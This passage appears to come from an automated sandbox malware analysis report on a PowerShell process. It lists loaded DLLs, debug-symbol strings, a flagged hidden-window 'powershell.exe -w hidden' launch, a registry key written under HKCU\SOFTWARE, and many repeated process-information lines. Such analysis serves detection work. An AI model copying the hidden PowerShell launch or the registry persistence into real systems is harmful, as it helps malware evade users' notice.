Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb2]xU source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1716838402.000001BB7EA6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717479831.000001BB7EAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb. source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb: source: powershell.exe, 00000006.00000002.1717866725.000001BB7EB64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717945607.000001BB7EB79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1716592666.000001BB7EA32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1717721868.000001BB7EB42000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A4C02 push eax; iretd 6_2_00007FFD9B8A4C69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8B095D push esp; retf 6_2_00007FFD9B8B095E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A776A push eax; iretd 6_2_00007FFD9B8A786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\3F8E9C71781CC56F1C2A 82BCF176D913F0776418319F42DC5D04ED32E1FA7228CC3802D41E62B5147256Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
